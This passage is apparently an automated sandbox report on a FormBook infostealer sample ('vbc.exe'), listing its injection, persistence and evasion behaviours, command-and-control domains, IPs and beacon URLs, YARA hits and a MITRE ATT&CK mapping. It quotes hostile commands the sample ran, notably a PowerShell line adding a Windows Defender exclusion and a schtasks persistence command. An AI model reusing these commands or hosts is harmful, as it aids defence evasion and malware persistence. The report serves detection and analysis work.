          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0188FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018AFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018AFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0183927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Domain query: www.miabellavita.com
          Source: C:\Windows\explorer.exe Domain query: www.joye.club
          Source: C:\Windows\explorer.exe Domain query: www.maikoufarm.com
          Source: C:\Windows\explorer.exe Domain query: www.mmj0115.xyz
          Source: C:\Windows\explorer.exe Network Connect: 44.227.65.245 80
          Source: C:\Windows\explorer.exe Domain query: www.septemberstockevent200.com
          Source: C:\Windows\explorer.exe Domain query: www.watermountsteam.top
          Source: C:\Windows\explorer.exe Network Connect: 104.21.4.114 80
          Source: C:\Windows\explorer.exe Domain query: www.yungbredda.com
          Source: C:\Windows\explorer.exe Domain query: www.leewaysvcs.com
          Source: C:\Windows\explorer.exe Domain query: www.sharpstead.com
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Network Connect: 118.27.122.222 80
          Source: C:\Windows\explorer.exe Network Connect: 172.67.188.247 80
          Source: C:\Windows\explorer.exe Network Connect: 101.132.116.91 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\vbc.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 120000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\vbc.exe Thread register set: target process: 3292
          Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3292
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
          Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
          Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
          Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
          Source: explorer.exe, 0000000B.00000000.305520960.0000000005F40000.00000004.00000001.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.266771972.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
          Source: explorer.exe, 0000000B.00000000.302023782.0000000001400000.00000002.00020000.sdmp, help.exe, 00000014.00000002.515690504.0000000005240000.00000002.00020000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Users\user\Desktop\vbc.exe VolumeInformation
          Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBook
Source: Yara match | File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 512 | Masquerading 1 | Input Capture 1 | Query Registry 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Disable or Modify Tools 11 | LSASS Memory | Security Software Discovery 221 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 512 | NTDS | Virtualization/Sandbox Evasion 31 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 3 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 13 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 112 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
2 Behavior Graph ID: 518412 Sample: vbc.exe Startdate: 09/11/2021 Architecture: WINDOWS Score: 100
35 www.mattlambert.xyz 2->35
37 www.joy1263.com 2->37
39 7 other IPs or domains 2->39
47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47
49 Found malware configuration 2->49
51 Malicious sample detected (through community Yara rule) 2->51
53 9 other signatures 2->53
9 vbc.exe 7 2->9 started
31 C:\Users\user\AppData\...\uZlkYhlkeLeaKC.exe, PE32 9->31 dropped
33 C:\Users\user\AppData\Local\...\tmpAA68.tmp, XML 9->33 dropped
59 Uses schtasks.exe or at.exe to add and modify task schedules 9->59
61 Adds a directory exclusion to Windows Defender 9->61
63 Tries to detect virtualization through RDTSC time measurements 9->63
13 vbc.exe 9->13 started
16 powershell.exe 25 9->16 started
18 schtasks.exe 1 9->18 started
71 Modifies the context of a thread in another process (thread injection) 13->71
73 Maps a DLL or memory area into another process 13->73
75 Sample uses process hollowing technique 13->75
77 Queues an APC in another process (thread injection) 13->77
20 explorer.exe 13->20 injected
24 conhost.exe 16->24 started
26 conhost.exe 18->26 started
41 www.maikoufarm.com 118.27.122.222, 49815, 80 INTERQGMOInternetIncJP Japan 20->41
43 www.mmj0115.xyz 101.132.116.91, 49821, 80 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 20->43
45 9 other IPs or domains 20->45
55 System process connects to network (likely due to code injection or exploit) 20->55
57 Performs DNS queries to domains with low reputation 20->57
28 help.exe 20->28 started
65 Modifies the context of a thread in another process (thread injection) 28->65
67 Maps a DLL or memory area into another process 28->67
69 Tries to detect virtualization through RDTSC time measurements 28->69

No Antivirus matches
Source | Detection | Scanner | Label | Link | Download
8.0.vbc.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
8.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
8.0.vbc.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
8.0.vbc.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
Source | Detection | Scanner | Label | Link
www.miabellavita.com | 0% | Virustotal | | Browse
mattlambert.xyz | 4% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
www.septemberstockevent200.com/ht08/ | 0% | Avira URL Cloud | safe |
http://www.septemberstockevent200.com/ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH | 0% | Avira URL Cloud | safe |
http://www.joye.club/ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH | 100% | Avira URL Cloud | phishing |
http://www.maikoufarm.com/ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH | 0% | Avira URL Cloud | safe |
http://www.miabellavita.com/ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH | 0% | Avira URL Cloud | safe |
http://www.mattlambert.xyz/ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH | 100% | Avira URL Cloud | phishing |
http://www.sharpstead.com/ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH | 0% | Avira URL Cloud | safe |
http://www.mmj0115.xyz/ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.septemberstockevent200.com | 172.67.188.247 | true | true | | unknown
www.miabellavita.com | 104.21.4.114 | true | true | | unknown
mattlambert.xyz | 34.102.136.180 | true | false | | unknown
z010-gp-hk-06-75-adfh31.greycdn.net | 103.118.81.108 | true | false | | unknown
www.maikoufarm.com | 118.27.122.222 | true | true | | unknown
www.sharpstead.com | 44.227.65.245 | true | true | | unknown
joye.club | 34.102.136.180 | true | false | | unknown
yungbredda.com | 34.102.136.180 | true | false | | unknown
www.mmj0115.xyz | 101.132.116.91 | true | true | | unknown
ghs.googlehosted.com | 142.250.203.115 | true | false | | unknown
www.watermountsteam.top | unknown | unknown | true | | unknown
www.joye.club | unknown | unknown | true | | unknown
www.yungbredda.com | unknown | unknown | true | | unknown
www.leewaysvcs.com | unknown | unknown | true | | unknown
www.joy1263.com | unknown | unknown | true | | unknown
www.annikadaniel.love | unknown | unknown | true | | unknown
www.mattlambert.xyz | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
www.septemberstockevent200.com/ht08/ | true | Avira URL Cloud: safe | low
http://www.septemberstockevent200.com/ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH | true | Avira URL Cloud: safe | unknown
http://www.joye.club/ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH | false | Avira URL Cloud: phishing | unknown
http://www.maikoufarm.com/ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH | true | Avira URL Cloud: safe | unknown
http://www.miabellavita.com/ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH | true | Avira URL Cloud: safe | unknown
http://www.mattlambert.xyz/ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH | false | Avira URL Cloud: phishing | unknown
http://www.sharpstead.com/ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH | true | Avira URL Cloud: safe | unknown
http://www.mmj0115.xyz/ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 0000000B.00000000.291685186.0000000006870000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp | false | | high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.21.4.114 | www.miabellavita.com | United States | | 13335 | CLOUDFLARENETUS | true
34.102.136.180 | mattlambert.xyz | United States | | 15169 | GOOGLEUS | false
